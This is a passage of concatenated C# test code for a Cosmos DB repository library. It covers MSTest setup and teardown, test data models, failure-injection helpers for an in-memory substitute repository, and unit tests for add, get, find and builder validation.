services.Configure<EnvironmentConfig>(configuration.GetSection("EnvironmentConfig"));
Services = services.BuildServiceProvider();
var envConfig = Services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
if (envConfig.RandomizeDbName)
{
// Mutates the options instance in place; Cleanup below re-fetches the same
// cached IOptions value, so it sees the randomized name.
var dbConfig = Services.GetRequiredService<IOptions<CosmosDbConfig>>().Value ;
dbConfig.DbName = $"{dbConfig.DbName}!{Guid.NewGuid()}";
}
}
[AssemblyCleanup]
public static void Cleanup()
{
if (Services != null)
{
var envConfig = Services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
if (envConfig.DeleteDatabaseOnClose)
{
var dbConfig = Services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
var client = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey);
var repo = new CosmosDbBuilder()
.WithId(dbConfig.DbName)
.WithDefaultThroughput(400)
.Build(client);
// Synchronous wait is fine here: MSTest assembly cleanup is not async.
repo.DeleteAsync().Wait();
}
}
}
}
}
<file_sep>using System;
using System.Linq;
using System.Threading;
namespace CosmosDbRepositoryTest.StringId
{
/// <summary>
/// Test-fixture base for repositories keyed by string ids.
/// </summary>
public class CosmosDbRepositoryStringTests
    : CosmosDbRepositoryTests<TestData<string>>
{
    private readonly Random _random = new Random();
    private static int _serialnumber;

    /// <summary>
    /// Builds a fresh id: 16 random uppercase letters followed by a zero-padded,
    /// process-wide serial number (so ids never collide within a test run).
    /// </summary>
    protected string GetNewId()
    {
        var letters = new char[16];
        for (var i = 0; i < letters.Length; i++)
        {
            // Next upper bound is exclusive, hence 'Z' + 1 to include 'Z'.
            letters[i] = (char)_random.Next('A', 'Z' + 1);
        }
        var serial = Interlocked.Increment(ref _serialnumber);
        return new string(letters) + serial.ToString("0000");
    }
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Nested test document level holding an array of grandchild records;
/// serialized under the "subsubdata" JSON property.
/// </summary>
public class TestSubData
{
[JsonProperty("subsubdata")]
public TestSubSubData[] SubSubData { get; set; }
}
}<file_sep>using CosmosDbRepository;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Common base for repository tests: provides a test-data factory and the
/// per-test TestingContext factory.
/// </summary>
public class CosmosDbRepositoryTests<T>
{
/// <summary>
/// Creates a TestData document with a fresh Guid id, applies the optional
/// setup hook, and adds it through the context's repository.
/// </summary>
protected Task<TestData<Guid>> GetTestData(
TestingContext<TestData<Guid>> context,
string uniqueData,
int rank = 0,
Action<TestData<Guid>> setupAction = null)
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = rank
};
setupAction?.Invoke(data);
return context.Repo.AddAsync(data);
}
/// <summary>Creates a disposable per-test context, forwarding optional builder hooks.</summary>
protected TestingContext<T> CreateContext(Action<ICosmosDbBuilder> builderCallback = null, Action<ICosmosDbRepositoryBuilder> repoBuilderCallback = null)
{
return new TestingContext<T>(builderCallback, repoBuilderCallback);
}
}
}<file_sep>using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.DocId
{
// GetAsync tests for documents keyed by the DocumentId wrapper type: hit and
// miss, both by document instance and by raw id.
[TestClass]
public class CosmosDbRepositoryGetTests
: CosmosDbRepositoryTests<TestData<DocumentId>>
{
// Added document can be fetched back by instance and round-trips equivalently.
[TestMethod]
public async Task Get_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
var data2 = await context.Repo.GetAsync(data);
data2.Should().BeEquivalentTo(data);
}
}
// Same as above but fetching by the id value rather than the document.
[TestMethod]
public async Task Get_ById_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
var data2 = await context.Repo.GetAsync(data.Id);
data2.Should().BeEquivalentTo(data);
}
}
// A missing document yields default (null), not an exception.
[TestMethod]
public async Task Get_NotFound_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
var data2 = await context.Repo.GetAsync(data);
data2.Should().Be(default);
}
}
// Missing id lookup likewise yields default (null).
[TestMethod]
public async Task Get_ById_NotFound_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<DocumentId>
{
Id = Guid.NewGuid(),
Data = "Old Data"
};
var data2 = await context.Repo.GetAsync(data.Id);
data2.Should().Be(default);
}
}
}
}
<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Leaf record of the nested test-document hierarchy (see TestSubData).
/// </summary>
public class TestSubSubData
{
[JsonProperty("id")]
public Guid Id { get; set; }
[JsonProperty("value")]
public string Value { get; set; }
}
}<file_sep>using CosmosDbRepository;
using CosmosDbRepository.Substitute;
namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// In-memory testing context: exposes a CosmosDbRepositorySubstitute instead of a
/// real Cosmos DB repository, so Dispose has nothing to clean up.
/// </summary>
public class TestingSubstituteContext<T>
: ITestingContext<T>
{
public ICosmosDbRepository<T> Repo { get; private set; }
public TestingSubstituteContext()
{
Repo = new CosmosDbRepositorySubstitute<T>();
}
// No external resources are held; intentionally a no-op.
public void Dispose()
{
}
}
}<file_sep>using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
/// <summary>
/// Task helpers for tests that deliberately await faulted tasks.
/// </summary>
public static class ExceptionExtensions
{
    /// <summary>
    /// Observes any exception on <paramref name="task"/> and returns a task that
    /// always completes successfully, so a faulted task can be awaited without
    /// throwing (and without triggering UnobservedTaskException later).
    /// </summary>
    public static Task SwallowException(this Task task)
        => task.ContinueWith(_ => { }, TaskContinuationOptions.ExecuteSynchronously);

    /// <summary>
    /// Misspelled legacy name kept so existing callers keep compiling;
    /// prefer <see cref="SwallowException"/>.
    /// </summary>
    public static Task ShollowException(this Task task)
        => task.SwallowException();
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
// AddAsync tests for Guid-keyed documents: plain insert and duplicate-id conflict.
[TestClass]
public class CosmosDbRepositoryAddTests
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task Add_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
}
}
// Adding the same id twice must fault with an HTTP 409 DocumentClientException.
[TestMethod]
public async Task Add_Expect_Conflict()
{
using (var context = CreateContext())
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
await context.Repo.AddAsync(data);
var faultedTask = context.Repo.AddAsync(data);
// Swallow so the await doesn't throw; the task object is inspected directly below.
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.Conflict);
}
}
}
}
<file_sep>using System;
namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// Per-test configuration (bound from the "TestConfig" settings section).
/// </summary>
public class TestConfig
{
    public string CollectionName { get; set; }

    /// <summary>
    /// Returns an independent copy so a test may mutate the name without
    /// affecting the shared options instance. MemberwiseClone suffices: the
    /// only state is a single string property.
    /// </summary>
    internal TestConfig Clone() => (TestConfig)MemberwiseClone();
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// Simple test document keyed by an arbitrary id type. The underscore-prefixed
/// JSON properties map the Cosmos DB system fields (_etag, _ts).
/// </summary>
public class TestData<T>
{
[JsonProperty("id")]
public T Id { get; set; }
[JsonProperty("data")]
public string Data { get; set; }
[JsonProperty("rank")]
public int Rank { get; set; }
// Concurrency token maintained by the service.
[JsonProperty("_etag")]
public string ETag { get; set; }
// Last-modified timestamp (epoch seconds) maintained by the service.
[JsonProperty("_ts")]
public long UpdateEpoch { get; set; }
}
}<file_sep>using CosmosDbRepository.Types;
using System;
using System.Net;
namespace CosmosDbRepository.Substitute
{
/// <summary>
/// Failure-injection helpers for tests. Each Generate*/Clear* method validates its
/// arguments and forwards to the matching member on the underlying
/// <c>CosmosDbRepositorySubstitute&lt;T&gt;</c>; a non-substitute repository fails
/// fast with <see cref="ArgumentException"/>.
/// </summary>
public static class CosmosDbRepositorySubstituteExtensions
{
    // Shared guard: self must be non-null and must actually be the substitute.
    // Centralizes the null/type-check boilerplate every public method used to repeat.
    private static CosmosDbRepositorySubstitute<T> AsSubstitute<T>(ICosmosDbRepository<T> self)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (!(self is CosmosDbRepositorySubstitute<T> substitute))
            throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
        return substitute;
    }

    // Each Generate* method checks self, then predicate, then the substitute cast.
    // (This also normalizes the Select/SelectMany overloads, which previously
    // checked predicate before self, unlike every sibling.)

    public static void GenerateExceptionOnGetWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<DocumentId> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnGetWhen(predicate, statusCode, message);
    }

    public static void GenerateExceptionOnGetWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<T> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnGetWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnGet<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnGet();

    public static void GenerateExceptionOnAddWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<T> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnAddWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnAdd<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnAdd();

    public static void GenerateExceptionOnDeleteWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<DocumentId> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnDeleteWhen(predicate, statusCode, message);
    }

    public static void GenerateExceptionOnDeleteWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<T> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnDeleteWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnDelete<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnDelete();

    public static void GenerateExceptionOnFindWhen<T>(this ICosmosDbRepository<T> self,
        Func<bool> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnFindWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnFind<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnFind();

    public static void GenerateExceptionOnFindFirstOrDefaultWhen<T>(this ICosmosDbRepository<T> self,
        Func<bool> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnFindFirstOrDefaultWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnFindFirstOrDefault<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnFindFirstOrDefault();

    public static void GenerateExceptionOnReplaceWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<T> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnReplaceWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnReplace<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnReplace();

    public static void GenerateExceptionOnSelectWhen<T>(this ICosmosDbRepository<T> self,
        Func<bool> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnSelectWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnSelect<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnSelect();

    public static void GenerateExceptionOnSelectManyWhen<T>(this ICosmosDbRepository<T> self,
        Func<bool> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnSelectManyWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnSelectMany<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnSelectMany();

    public static void GenerateExceptionOnUpsertWhen<T>(this ICosmosDbRepository<T> self,
        Predicate<T> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnUpsertWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnUpsert<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnUpsert();

    public static void GenerateExceptionOnCountWhen<T>(this ICosmosDbRepository<T> self,
        Func<bool> predicate,
        HttpStatusCode statusCode,
        string message = default)
    {
        if (self is null) throw new ArgumentNullException(nameof(self));
        if (predicate is null) throw new ArgumentNullException(nameof(predicate));
        AsSubstitute(self).GenerateExceptionOnCountWhen(predicate, statusCode, message);
    }

    public static void ClearGenerateExceptionOnCount<T>(this ICosmosDbRepository<T> self)
        => AsSubstitute(self).ClearGenerateExceptionOnCount();
}
}
<file_sep>using CosmosDbRepository;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using System;
namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// Per-test harness that builds a collection (optionally uniquely named) against a
/// real Cosmos DB instance and tears it down on Dispose.
/// </summary>
public class TestingContext<T>
    : ITestingContext<T>
{
    public readonly DocumentClient DbClient;
    public readonly ICosmosDb CosmosDb;
    public readonly CosmosDbConfig DbConfig;
    public readonly TestConfig TestConfig;
    public readonly EnvironmentConfig EnvConfig;
    public ICosmosDbRepository<T> Repo { get; private set; }
    private bool _disposed;

    public TestingContext(Action<ICosmosDbBuilder> builderCallback, Action<ICosmosDbRepositoryBuilder> repoBuilderCallback)
    {
        var services = TestFramework.Services;
        DbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
        // Clone so the per-test collection-name mutation below doesn't leak into
        // the shared options instance used by other tests.
        TestConfig = services.GetRequiredService<IOptions<TestConfig>>().Value.Clone();
        EnvConfig = services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
        if (EnvConfig.RandomizeCollectionName)
        {
            TestConfig.CollectionName = $"{TestConfig.CollectionName}{Guid.NewGuid()}";
        }
        DbClient = new DocumentClient(new Uri(DbConfig.DbEndPoint), DbConfig.DbKey);
        var builder = new CosmosDbBuilder()
            .WithId(DbConfig.DbName)
            .WithDefaultThroughput(400)
            .AddCollection<T>(TestConfig.CollectionName, repoBuilderCallback);
        builderCallback?.Invoke(builder);
        CosmosDb = builder.Build(DbClient);
        Repo = CosmosDb.Repository<T>();
    }

    public void Dispose()
    {
        if (_disposed)
            return;
        _disposed = true;
        if (EnvConfig.DeleteCollectionsOnClose)
        {
            // Block until the delete completes. The previous version fired the task
            // and immediately disposed the client, which could abort the delete.
            Repo.DeleteAsync().GetAwaiter().GetResult();
        }
        // Always release the client, even when collections are being kept
        // (previously it leaked whenever DeleteCollectionsOnClose was false).
        DbClient.Dispose();
    }
}
}<file_sep>using CosmosDbRepository;
using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
[TestClass]
public class CosmosDbBuilderTest
{
    [TestMethod]
    public void WithId_ValidName_Success()
    {
        // FIX: renamed from WithId_NullName_Success — the body passes a
        // valid name, not null (the null case is the next test).
        new CosmosDbBuilder().WithId("MyCollection");
    }

    [TestMethod]
    public void WithId_NullName_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(null);
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void WithId_EmptyName_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(string.Empty);
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void WithId_WhitespaceName_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(" ");
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void WithId_DoubleSet_Expect_InvalidOperationException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId("1").WithId("2");
        action.Should().ThrowExactly<InvalidOperationException>();
    }

    [TestMethod]
    public void AddCollection_Success()
    {
        new CosmosDbBuilder().AddCollection<TestData<Guid>>();
    }

    [TestMethod]
    public void AddCollection_WithCallback_Success()
    {
        new CosmosDbBuilder().AddCollection<TestData<Guid>>("MyCollection", _ => { });
    }

    [TestMethod]
    public void AddCollection_EmptyName_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().AddCollection<TestData<Guid>>(string.Empty);
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void AddCollection_WhitespaceName_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().AddCollection<TestData<Guid>>(" ");
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void AddCollection_IncludeIndexPath_NullIndexPath_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath(null, Index.Range(DataType.String)));
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void AddCollection_IncludeIndexPath_EmptyIndexPath_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath(string.Empty, Index.Range(DataType.String)));
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void AddCollection_IncludeIndexPath_Success()
    {
        new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath("/id", Index.Range(DataType.String)));
    }

    [TestMethod]
    public void AddCollection_ExcludeIndexPath_NullIndexPath_Expect_ArgumentNullException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath(null));
        action.Should().ThrowExactly<ArgumentNullException>();
    }

    [TestMethod]
    public void AddCollection_ExcludeIndexPath_EmptyIndexPath_Expect_ArgumentException()
    {
        Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath(""));
        action.Should().ThrowExactly<ArgumentException>();
    }

    [TestMethod]
    public void AddCollection_ExcludeIndexPath_Success()
    {
        new CosmosDbBuilder()
            .AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath("/data"));
    }

    [TestMethod]
    public void Build_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            new CosmosDbBuilder().WithId("MyDatabase").Build(dbClient);
        }
    }

    [TestMethod]
    public void Build_NoId_Expect_InvalidOperationException()
    {
        Func<ICosmosDb> action = () => new CosmosDbBuilder().Build(null);
        action.Should().ThrowExactly<InvalidOperationException>();
    }

    [TestMethod]
    public void Build_NullClient_Expect_ArgumentNullException()
    {
        // FIX: renamed from Build_NullClient_Expect_InvalidOperationException —
        // the assertion below (and Build's contract for a null client)
        // is ArgumentNullException.
        Func<ICosmosDb> action = () => new CosmosDbBuilder().WithId("MyDatabase").Build(null);
        action.Should().ThrowExactly<ArgumentNullException>();
    }

    [TestMethod]
    public void Build_WithCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestData<Guid>>()
                .Build(dbClient);
        }
    }

    [TestMethod]
    public void Build_WithNamedCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass>("MyTestClass")
                .Build(dbClient);
        }
    }

    [TestMethod]
    public void Build_WithAttributeNamedCollection_Success()
    {
        // NOTE(review): this passes an explicit collection name, so it does not
        // actually exercise the [CosmosDbRepositoryName] attribute on TestClass —
        // compare Repository_WithAttributeNamedCollection_Success. Confirm intent.
        using (var dbClient = CreateDocumentClient())
        {
            new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass>("TestClass")
                .Build(dbClient);
        }
    }

    [TestMethod]
    public void Build_WithClassNamedCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass2>()
                .Build(dbClient);
        }
    }

    [TestMethod]
    public void Repository_WithNamedCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            var db = new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass>("MyTestClass")
                .Build(dbClient);

            db.Repository<TestClass>("MyTestClass");
        }
    }

    [TestMethod]
    public void Repository_WithAttributeNamedCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            var db = new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass>()
                .Build(dbClient);

            db.Repository<TestClass>();
        }
    }

    [TestMethod]
    public void Repository_WithClassNamedCollection_Success()
    {
        using (var dbClient = CreateDocumentClient())
        {
            var db = new CosmosDbBuilder()
                .WithId("MyDatabase")
                .WithDefaultThroughput(400)
                .AddCollection<TestClass2>()
                .Build(dbClient);

            db.Repository<TestClass2>();
        }
    }

    // Creates a DocumentClient from the test configuration. Extracted to
    // remove the services/dbConfig boilerplate repeated in every
    // Build_*/Repository_* test above.
    private static DocumentClient CreateDocumentClient()
    {
        var services = TestFramework.Services;
        var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
        return new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey);
    }

    // Collection name supplied via attribute (used by the attribute-naming tests).
    [CosmosDbRepositoryName("TheTestClass")]
    private class TestClass
    {
    }

    // No attribute: collection name falls back to the class name.
    private class TestClass2
    {
    }

    //[TestMethod]
    //public async Task WithId_NullName_ExpectException()
    //{
    //    var services = TestFramework.Services;
    //    DbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
    //    TestConfig = services.GetRequiredService<IOptions<TestConfig>>().Value.Clone();
    //    EnvConfig = services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
    //    if (EnvConfig.RandomizeCollectionName)
    //    {
    //        TestConfig.CollectionName = $"{TestConfig.CollectionName}{Guid.NewGuid()}";
    //    }
    //    DbClient = new DocumentClient(new Uri(DbConfig.DbEndPoint), DbConfig.DbKey);
    //    var builder = new CosmosDbBuilder()
    //        .WithId(DbConfig.DbName)
    //        .AddCollection<T>(TestConfig.CollectionName, repoBuilderCallback);
    //    builderCallback?.Invoke(builder);
    //    CosmosDb = builder.Build(DbClient);
    //    Repo = CosmosDb.Repository<T>();
    //}
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
[TestClass]
public class CosmosDbRepositoryFindTests
    : CosmosDbRepositoryTests<TestData<Guid>>
{
    // Builds a TestData item with a fresh id. Extracted to remove the
    // object-initializer boilerplate repeated in every test below.
    private static TestData<Guid> NewItem(string data, int rank = 0) =>
        new TestData<Guid>
        {
            Id = Guid.NewGuid(),
            Data = data,
            Rank = rank
        };

    [TestMethod]
    public async Task Find_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = await context.Repo.AddAsync(NewItem(uniqueData));

            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData);
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data });
        }
    }

    [TestMethod]
    public async Task Find_Expect_Success_WithNoData()
    {
        using (var context = CreateContext())
        {
            // Nothing added for this unique value, so the result must be empty.
            var uniqueData = Guid.NewGuid().ToString();
            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData);
            dataList.Should().BeEmpty();
        }
    }

    [TestMethod]
    public async Task Find_Expect_Success_OrderedAscending()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = await context.Repo.AddAsync(NewItem(uniqueData, rank: 1));
            var data2 = await context.Repo.AddAsync(NewItem(uniqueData, rank: 2));

            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data, data2 });
            dataList.Should().BeInAscendingOrder(d => d.Rank);
        }
    }

    [TestMethod]
    public async Task Find_Expect_Success_OrderedDescending()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = await context.Repo.AddAsync(NewItem(uniqueData, rank: 1));
            var data2 = await context.Repo.AddAsync(NewItem(uniqueData, rank: 2));

            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderByDescending(d => d.Rank));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data, data2 });
            dataList.Should().BeInDescendingOrder(d => d.Rank);
        }
    }

    [TestMethod]
    public async Task Find_WithSkipTake_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = await context.Repo.AddAsync(NewItem(uniqueData, rank: 1));
            var data2 = await context.Repo.AddAsync(NewItem(uniqueData, rank: 2));

            // Page 1 of size 1, then page 2 of size 1.
            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(0).Take(1));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data });

            dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(1).Take(1));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data2 });
        }
    }

    [TestMethod]
    public async Task Find_WithSkipTake_NewData_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var uniqueData = Guid.NewGuid().ToString();
            var data = await context.Repo.AddAsync(NewItem(uniqueData, rank: 1));
            var data2 = await context.Repo.AddAsync(NewItem(uniqueData, rank: 2));

            var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(0).Take(1));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data });

            // A third item added between pages must appear on the third page.
            var data3 = await context.Repo.AddAsync(NewItem(uniqueData, rank: 3));

            dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(1).Take(1));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data2 });

            dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(2).Take(1));
            dataList.Should().NotBeNull();
            dataList.Should().BeEquivalentTo(new[] { data3 });
        }
    }
}
}
<file_sep>namespace CosmosDbRepositorySubstituteTest
{
/// <summary>
/// Configuration for connecting to a Cosmos DB account in tests
/// (bound from test configuration via IOptions elsewhere in this suite).
/// </summary>
public class CosmosDbConfig
{
    // Account key used to authenticate the DocumentClient.
    public string DbKey { get; set; }
    // Database name.
    public string DbName { get; set; }
